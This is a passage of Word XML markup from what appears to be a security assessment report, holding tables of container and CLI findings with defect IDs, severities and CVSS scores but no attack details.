      <w:tr w:rsidR="009604BC" w14:paraId="3D621C12" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3AC06A03" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Active Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02AFD35B" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E4BEA81" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId14" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=194310">
              <w:r>
                <w:t>194310</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1BABA"/>
          </w:tcPr>
          <w:p w14:paraId="3170234B"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3606C937" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="77DBB740" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
      <w:pPr>
        <w:spacing w:before="100" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="431214DA" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Container/PODs Security Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblInd w:w="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50" w:type="dxa"/>
          <w:bottom w:w="70" w:type="dxa"/>
          <w:right w:w="50" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2455"/>
        <w:gridCol w:w="2531"/>
        <w:gridCol w:w="1257"/>
        <w:gridCol w:w="2061"/>
        <w:gridCol w:w="1156"/>
      </w:tblGrid>
      <w:tr w:rsidR="009604BC" w14:paraId="18D75D6D" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="27B6B9C0" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="2800CA53" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="415EA83F" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Defect Id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="67694769" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="4CE56EC5" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="3EF33001" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1927DA9E" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Active Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28FAA5D5" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32B8AC54" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId15" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=193926">
              <w:r>
                <w:t>193926</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FDC20A"/>
          </w:tcPr>
          <w:p w14:paraId="71B7E515" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FDC20A"/>
          </w:tcPr>
          <w:p w14:paraId="36DC5D47" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId16" w:anchor="CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N">
              <w:r>
                <w:rPr>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>5.1</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="12A7DF6C" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12856D95" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Active Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23C9B117" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B9B8F88" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId17" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=193928">
              <w:r>
                <w:t>193928</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FDC20A"/>
          </w:tcPr>
          <w:p w14:paraId="69DE1584" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FDC20A"/>
          </w:tcPr>
          <w:p w14:paraId="07EC633D" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId18" w:anchor="CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L">
              <w:r>
                <w:rPr>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>4.5</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="46F1C8C3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D32F7EB" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Active Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="375DC95D" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2402CA35" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId19" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=194312">
              <w:r>
                <w:t>194312</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1BABA"/>
          </w:tcPr>
          <w:p w14:paraId="1A14096E"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0DBA80F4" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="2366F8A0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44AFBC8D" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Active Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24E153A7" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7352ECC1" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId20" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=194313">
              <w:r>
                <w:t>194313</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1BABA"/>
          </w:tcPr>
          <w:p w14:paraId="4F51A611"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0A5CC10E" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="79BFB65A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="405CD0FD" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Active Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="43CA62F6" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4643442B" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId21" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=194316">
              <w:r>
                <w:t>194316</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1BABA"/>
          </w:tcPr>
          <w:p w14:paraId="1D9B066E"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5F527783" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="4E7A3013" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AC38BC3" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Active Reconnaissance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AD5956D" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7ED24B6A" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId22" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=194315">
              <w:r>
                <w:t>194315</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1BABA"/>
          </w:tcPr>
          <w:p w14:paraId="64A41306"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057AAE37" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="1BEB4483" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4093164E" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Auditing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1700" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="65CB7A29" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A1A7034" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId23" w:anchor="action=com.ibm.team.workitem.viewWorkItem&amp;id=194317">
              <w:r>
                <w:t>194317</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1BABA"/>
          </w:tcPr>
          <w:p w14:paraId="734F57A6" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C1BABA"/>
          </w:tcPr>
          <w:p w14:paraId="45E27690" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2BB01308" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
      <w:pPr>
        <w:spacing w:before="100" w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B1637FE" w14:textId="77777777" w:rsidR="00D36D1A" w:rsidRDefault="00D36D1A">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CD6F1A6" w14:textId="5BBFE08C" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CLI Security Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblInd w:w="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50" w:type="dxa"/>
          <w:bottom w:w="70" w:type="dxa"/>
          <w:right w:w="50" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2455"/>
        <w:gridCol w:w="2531"/>
        <w:gridCol w:w="1257"/>
        <w:gridCol w:w="2061"/>
        <w:gridCol w:w="1156"/>
      </w:tblGrid>
      <w:tr w:rsidR="009604BC" w14:paraId="061E51C8" w14:textId="77777777" w:rsidTr="00D74B2A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2455" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="7D013BAD" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2531" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="335B5BE7" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1257" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="52E170BA" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Defect Id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2061" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="2DAE782C" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1156" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="1944F958" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D74B2A" w14:paraId="2D77615B" w14:textId="77777777" w:rsidTr="00D74B2A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2455" w:type="dxa"/>
          </w:tcPr>
